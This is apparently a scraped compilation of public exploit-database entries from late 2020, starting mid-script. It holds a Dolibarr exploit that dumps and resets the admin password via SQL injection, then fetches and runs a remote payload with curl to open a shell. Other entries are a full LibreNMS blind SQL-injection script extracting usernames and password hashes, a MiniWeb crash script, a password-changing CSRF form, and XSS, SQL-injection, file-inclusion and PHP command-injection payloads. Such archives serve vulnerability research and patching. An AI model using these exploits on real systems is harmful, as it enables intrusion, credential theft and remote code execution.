{tbl_name}") infos = {} for column_name in COLUMNS: elt_length = get_elt_len(url, tbl_name, column_name) infos[column_name] = get_elt(url, tbl_name, column_name, elt_leng= th) if DEBUG: print(f" [+] Infos: {infos}") return infos def main(url, username, password): # Check if exploit is possible print(f"[*] Requirements:") if not authenticate(url, username, password): print(f"[x] Exploit failed!") exit(-1) get_version(url) get_privileges(url) print(f"\n[*] Starting exploit:") # Evaluate delay evaluate_delay(url) print(f" [*] Extract prefix (using table: {LIKE})") tbl_name_len = get_tbl_name_len(url) tbl_name = get_tbl_name(url, tbl_name_len) prefix = f"{tbl_name.split('_')[0]}_" if DEBUG: print(f" [+] Prefix: {prefix}") # Dump admin's infos user_table_name = f"{prefix}user" infos = get_row(url, user_table_name) if not infos["login"]: print(f"[x] Exploit failed!") exit(-1) # Reset admin's passworrd if DEBUG: print(f" [*] Reseting {infos['login']}'s password") if not reset_password(url, infos["login"]): print(f"[x] Exploit failed!") exit(-1) infos = get_row(url, user_table_name) # Remove cookies to logout # Change admin's password # Login as admin SESSION.cookies.clear() if not change_password(url, infos['login'], infos['pass_temp']): print(f"[x] Exploit failed!") exit(-1) authenticate(url, infos['login'], infos['pass_temp']) # Change antivirus's binary path # Trigger reverse shell change_binary(url, "bash", '-c "$(curl http://127.0.0.1:8000/poc.txt)"'= ) trigger_exploit(url) return 0 if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-t", help="Base URL of Dolibarr") parser.add_argument("-u", help="Username") parser.add_argument("-p", help="Password") args = parser.parse_args() if not args.t or not args.u or not args.p: usage() main(args.t, args.u, args.p)

# Exploit Title: Courier Management System 1.0 - 'First Name' Stored XSS # Exploit Author: Zhaiyi (Zeo) # Date: 2020-12-11 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application Step 1: Log in to the CMS with any valid user credentials. Step 2: Click on the logged in username on header and select Manage Account. Step 3: Rename the user First Name or Last Name to "<script>alert(1111)</script>". Step 4: Update Profile and this will trigger the XSS. Step 5: Logout and login again and the page will display the domain name.

# Exploit Title: Courier Management System 1.0 - 'ref_no' SQL Injection # Exploit Author: Zhaiyi (Zeo) # Date: 2020-12-11 # Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application Step 1. Log into application with credentials Step 2. Click on Branch Step 3. Select New Branch http://127.0.0.1/index.php?page=new_branch Step 4. Fill the form , click on save Step 5. Capture the request of the ""/ajax.php?action=save_branch"" page inburpsute Step 6. Save request and run sqlmap on request file using command " sqlmap -r request --time-sec=5 --dbs " Step 7. This will inject successfully and you will have an information disclosure of all databases contents --- Parameter: ref_no (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ref_no=123' AND (SELECT 5575 FROM (SELECT(SLEEP(5)))ngIo) AND 'knst'='knst ---

# Exploit Title: MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC) # Date: 13.12.2020 # Exploit Author: securityforeveryone.com # Author Mail: hello[AT]securityforeveryone.com # Vendor Homepage: https://sourceforge.net/projects/miniweb/ # Software Link: https://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download # Version: 0.8.19 # Tested on: Win7 x86 # Researchers: Security For Everyone Team - https://securityforeveryone.com ''' Description MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the first parameter in a POST request. Exploitation The vulnerability is the first parameter's name of the POST request. Example: PARAM_NAME1=param_data1&param_name2=param_data2 if we send a lot of "A" characters to "PARAM_NAME1", the miniweb server will crash. About Security For Everyone Team We are a team that has been working on cyber security in the industry for a long time. In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities. We have many free tools that you can use here: https://securityforeveryone.com/free-tool-list ''' #!/usr/bin/python import socket import sys import struct if len(sys.argv) != 2 : print "[+] Usage : python exploit.py [VICTIM_IP]" exit(0) TCP_IP = sys.argv[1] TCP_PORT = 8000 xx = "A"*2038 #4085 http_req = "POST /index.html HTTP/1.1\r\n" http_req += "Host: 192.168.231.140\r\n" http_req += "From: header-data\r\n" http_req += "Content-Type: application/x-www-form-urlencoded\r\n\r\n" http_req += xx + "=param_data1&param_name2=param_data2" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TCP_IP, TCP_PORT)) print "[+] Sending exploit payload..." s.send(http_req) s.close()

# Exploit Title: Jenkins 2.235.3 - 'X-Forwarded-For' Stored XSS # Date: 11/12/2020 # Exploit Author: gx1 # Vendor Homepage: https://www.jenkins.io/ # Software Link: https://updates.jenkins-ci.org/download/war/ # Version: <= 2.251 and <= LTS 2.235.3 # Tested on: any # CVE : CVE-2020-2231 # References: https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1955 https://www.openwall.com/lists/oss-security/2020/08/12/4 Vendor Description: Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the remote address of the host starting a build via 'Trigger builds remotely'. This results in a stored cross-site scripting (XSS) vulnerability exploitable by users with Job/Configure permission or knowledge of the Authentication Token. Jenkins 2.252, LTS 2.235.4 escapes the remote address of the host. Technical Details and Exploitation: When a build of a project is completed, Jenkins returns a message in completed build process. Build process is present in build history view. The message reflects the username, for example "Started by user gx1". Anyway, when 'Trigger builds remotely feature' is enabled, instead of the username the remote client IP is reflected, i.e.: Started by remote host '<client-ip-address>'. To understand how remote build trigger works, have a look at this post: https://narenchejara.medium.com/trigger-jenkins-job-remotely-using-jenkins-api-20973618a493 The message "Starte by remote <client-ip-address> is not escaped. This could seem without security issues because the user cannot change the remote IP, right? This is not completely true... when the application server is behind a proxy, "remote client IP" is not available, as the request comes from the proxy. In these cases, X-Headers are used to allow the application server to understand the real client information. A common header is X-Forwarded-For: X-Forwarded-For HTTP header is inserted by load balancers into the data stream to identify the address of the connecting client system. To exploit the vulnerability the attacker requires several conditions: - Remote build should be enabled and if needed the attackers should have obtained API authentication token or should have Job/Configure permission - Application server that hosts Jenkins should use some X-Header to override client IP. This happens often, because usually the application server is under proxy, and in order to obtain client IP, override mechanisms are used. For example, in Apache Tomcat, it is possible to configure X-Forwarded-For heaer processing, as described in https://dacurry-tns.github.io/deploying-apereo-cas/setup_tomcat_configure-xforwardedfor-header-processing.html. Proof Of Concept: 1. Identify the X-Header that is used by the Application Server to override proxy ip. Let's suppose that "X-Forwarded-For" is used. In this condition, the attacker can inject malicious payloads in "X-Forwarded-For" header value to exploit the vulnerability; 2. Send the following request: GET /job/<project_name>/build?token=<token> HTTP/1.1 Host: <jenkins_host>:8080 X-Forwarded-For: gx1<script>alert(1);</script> Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: JSESSIONID=88DD2A6297E0E0FE9A59B310CA271715; screenResolution=1220x686 Connection: close HTTP/1.1 201 Cache-Control: private Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Content-Type-Options: nosniff Location: http://<vulnenv>:8080/jenkins/queue/item/7/ Content-Length: 0 Date: Fri, 11 Dec 2020 17:04:06 GMT Connection: close <project_name> is the project that can be remotely built by using <token>. 3. To trigger the XSS, navigate the build item present in the build history when the build is finished. For example, if the build current finished process is #16, stored XSS is present in http://<jenkins_host>/job/<project_name>/16/ Solution: The following releases contain fixes for security vulnerabilities: * Jenkins 2.252 * Jenkins LTS 2.235.4

# Exploit Title: Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password) # Date: 2020-12-14 # Exploit Author: KeopssGroup0day,Inc # Vendor Homepage: https://www.rukovoditel.net/ # Software Link: https://www.rukovoditel.net/download.php # Version: v2.6.1 # Tested on: Kali Linux POC(localhost/index.php?module=users/change_password): <html> <!-- CSRF PoC --> <body> <script>history.pushState('', '', '/')</script> <form action="https://localhost/index.php?module=users/change_password&action=change" method="POST"> <input type="hidden" name="form&#95;session&#95;token" value="D&#94;HUyTDh0X" /> <input type="hidden" name="password&#95;new" value="123456789" /> <input type="hidden" name="password&#95;confirmation" value="123456789" /> <input type="submit" value="Submit request" /> </form> </body> </html> --

# Exploit Title: LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection # Google Dork: Unknown # Date: 13-12-2020 # Exploit Author: Hodorsec # Vendor Homepage: https://www.librenms.org # Software Link: https://github.com/librenms/librenms # Update notice: https://community.librenms.org/t/v1-69-october-2020-info/13838 # Version: 1.46 # Tested on: Debian 10, PHP 7, LibreNMS 1.46; although newer version might be affected until 1.69 patch # CVE : N/A #!/usr/bin/python3 # EXAMPLE: # $ python3 poc_librenms-1.46_auth_sqli_timed.py librenms D32fwefwef http://192.168.252.14 2 # [*] Checking if authentication for page is required... # [*] Visiting page to retrieve initial token and cookies... # [*] Retrieving authenticated cookie... # [*] Printing number of rows in table... # 1 # [*] Found 1 rows of data in table 'users' # # [*] Retrieving 1 rows of data using 'username' as column and 'users' as table... # [*] Extracting strings from row 1... # librenms # [*] Retrieved value 'librenKs' for column 'username' in row 1 # [*] Retrieving 1 rows of data using 'password' as column and 'users' as table... # [*] Extracting strings from row 1... # $2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr # [*] Retrieved value '$2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr' for column 'password' in row 1 # # [+] Done! import requests import urllib3 import os import sys import re from bs4 import BeautifulSoup # Optionally, use a proxy # proxy = "http://<user>:<pass>@<proxy>:<port>" proxy = "" os.environ['http_proxy'] = proxy os.environ['HTTP_PROXY'] = proxy os.environ['https_proxy'] = proxy os.environ['HTTPS_PROXY'] = proxy # Disable cert warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Set timeout timeout = 10 # Injection prefix and suffix inj_prefix = "(select(sleep(" inj_suffix = ")))))" # Decimal begin and end dec_begin = 48 dec_end = 57 # ASCII char begin and end ascii_begin = 32 ascii_end = 126 # Handle CTRL-C def keyboard_interrupt(): """Handles keyboardinterrupt exceptions""" print("\n\n[*] User requested an interrupt, exiting...") exit(0) # Custom headers def http_headers(): headers = { 'User-Agent': 'Mozilla', } return headers def check_auth(url,headers): print("[*] Checking if authentication for page is required...") target = url + "/graph.php" r = requests.get(target,headers=headers,timeout=timeout,verify=False) if "Unauthorized" in r.text: return True else: return False def get_initial_token_and_cookies(url,headers): print("[*] Visiting page to retrieve initial token and cookies...") target = url + "/login" r = requests.get(target,headers=headers,timeout=timeout,verify=False) soup = BeautifulSoup(r.text,'html.parser') for n in soup('input'): if n['name'] == "_token": token = n['value'] return token,r.cookies else: return None,r.cookies def get_valid_cookie(url,headers,token,cookies,usern,passw): print("[*] Retrieving authenticated cookie...") appl_cookie = "laravel_session" post_data = {'_token':token, 'username':usern, 'password':passw, 'submit':''} target = url + "/login" r = requests.post(target,data=post_data,headers=headers,cookies=cookies,timeout=timeout,verify=False) res = r.text if "Overview | LibreNMS" in res: return r.cookies else: print("[!] No valid response from used session, exiting!\n") exit(-1) # Perform the SQLi call for injection def sqli(url,headers,cookies,inj_str,sleep): comment_inj_str = re.sub(" ","/**/",inj_str) inj_params = {'id':'1', 'stat':'none', 'type':'port_mac_acc_total', 'sort':comment_inj_str, 'debug':'1'} inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_params.items()) # Do GET request r = requests.get(url,params=inj_params_unencoded,headers=headers,cookies=cookies,timeout=timeout,verify=False) res = r.elapsed.total_seconds() if res >= sleep: return True elif res < sleep: return False else: print("[!] Something went wrong checking responses. Check responses manually. Exiting.") exit(-1) # Extract rows def get_rows(url,headers,cookies,table,sleep): rows = "" max_pos_rows = 4 # Get number maximum positional characters of rows: e.g. 1096,2122,1234,etc. for pos in range(1,max_pos_rows+1): # Test if current pos does have any valid value. If not, break direction = ">" inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))" + direction + "1,0," + str(sleep) + inj_suffix if not sqli(url,headers,cookies,inj_str,sleep): break # Loop decimals direction = "=" for num_rows in range(dec_begin,dec_end+1): row_char = chr(num_rows) inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))"=+ direction + str(num_rows) + ",0," + str(sleep) + inj_suffix if sqli(url,headers,cookies,inj_str,sleep): rows += row_char print(row_char,end='',flush=True) break if rows != "": print("\n[*] Found " + rows + " rows of data in table '" + table + "'\n") return int(rows) else: return False # Loop through positions and characters def get_data(url,headers,cookies,row,column,table,sleep): extracted = "" max_pos_len = 50 # Loop through length of string # Not very efficient, should use a guessing algorithm print("[*] Extracting strings from row " + str(row+1) + "...") for pos in range(1,max_pos_len): # Test if current pos does have any valid value. If not, break direction = ">" inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) += ",1)," + str(pos) + ",1))" + direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix if not sqli(url,headers,cookies,inj_str,sleep): break # Loop through ASCII printable characters direction = "=" for guess in range(ascii_begin,ascii_end+1): extracted_char = chr(guess) inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix if sqli(url,headers,cookies,inj_str,sleep): extracted += chr(guess) print(extracted_char,end='',flush=True) break return extracted # Main def main(argv): if len(sys.argv) == 5: usern = sys.argv[1] passw = sys.argv[2] url = sys.argv[3] sleep = int(sys.argv[4]) else: print("[*] Usage: " + sys.argv[0] + " <username> <password> <url> <sleep_in_seconds>\n") exit(0) # Random headers headers = http_headers() # Do stuff try: # Get a valid initial token and cookies token,cookies = get_initial_token_and_cookies(url,headers) # Check if authentication is required auth_required = check_auth(url,headers) if auth_required: # Get an authenticated session cookie using credentials valid_cookies = get_valid_cookie(url,headers,token,cookies,usern,passw) else: valid_cookies = cookies print("[+] Authentication not required, continue without authentication...") # Setting the correct vulnerable page url = url + "/graph.php" # The columns to retrieve columns = ['username','password'] # The table to retrieve data from table = "users" # Getting rows print("[*] Printing number of rows in table...") rows = get_rows(url,headers,valid_cookies,table,sleep) if not rows: print("[!] Unable to retrieve rows, checks requests.\n") exit(-1) # Getting values for found rows in specified columns for column in columns: print("[*] Retrieving " + str(rows) + " rows of data using '" + column + "' as column and '" + table + "' as table...") for row in range(0,rows): # rowval_len = get_length(url,headers,row,column,table) retrieved = get_data(url,headers,valid_cookies,row,column,table,sleep) print("\n[*] Retrieved value '" + retrieved + "' for column'" + column + "' in row " + str(row+1)) # Done print("\n[+] Done!\n") except requests.exceptions.Timeout: print("[!] Timeout error\n") exit(-1) except requests.exceptions.TooManyRedirects: print("[!] Too many redirects\n") exit(-1) except requests.exceptions.ConnectionError: print("[!] Not able to connect to URL\n") exit(-1) except requests.exceptions.RequestException as e: print("[!] " + str(e)) exit(-1) except requests.exceptions.HTTPError as e: print("[!] Failed with error code - " + str(e.code) + "\n") exit(-1) except KeyboardInterrupt: keyboard_interrupt() exit(-1) # If we were called as a program, go execute the main function. if __name__ == "__main__": main(sys.argv[1:])

# Exploit Title: System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path # Date: 2020-10-14 # Exploit Author: Mohammed Alshehri # Vendor Homepage: http://systemexplorer.net/ # Software Link: http://systemexplorer.net/download/SystemExplorerSetup.exe # Version: Version 7.0.0 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Service info: C:\Users\m507>sc qc SystemExplorerHelpService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: SystemExplorerHelpService TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : System Explorer Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.

# Exploit Title: Seacms 11.1 - 'file' Local File Inclusion # Date: 20201212 # Exploit Author: j5s # Vendor Homepage: https://www.seacms.net/ # Software Link: https://www.seacms.net/ # Version: 11.1 GET /SEACMS111/5f9js3/admin_safe.php?action=download&file=C:/windows/system.ini HTTP/1.1 Host: 192.168.137.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=scan Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396; PHPSESSID=t1gc019b35rrgmr1dg53gfje96; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D Upgrade-Insecure-Requests: 1 Vulnerable parameters： file payload：C:/windows/system.ini

# Exploit Title: Seacms 11.1 - 'ip and weburl' Remote Command Execution # Date: 20201212 # Exploit Author: j5s # Vendor Homepage: https://www.seacms.net/ # Software Link: https://www.seacms.net/ # Version: 11.1 POST /SeaCMS111/5f9js3/admin_ip.php?action=set HTTP/1.1 Host: 192.168.137.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 36 Origin: http://192.168.137.139 Connection: close Referer: http://192.168.137.139/SeaCMS111/5f9js3/admin_ip.php Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396; PHPSESSID=t1gc019b35rrgmr1dg53gfje96; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D Upgrade-Insecure-Requests: 1 v=0&ip=+%22%3Bphpinfo%28%29%3B%2F%2F Vulnerable parameters：ip payload：";phpinfo();//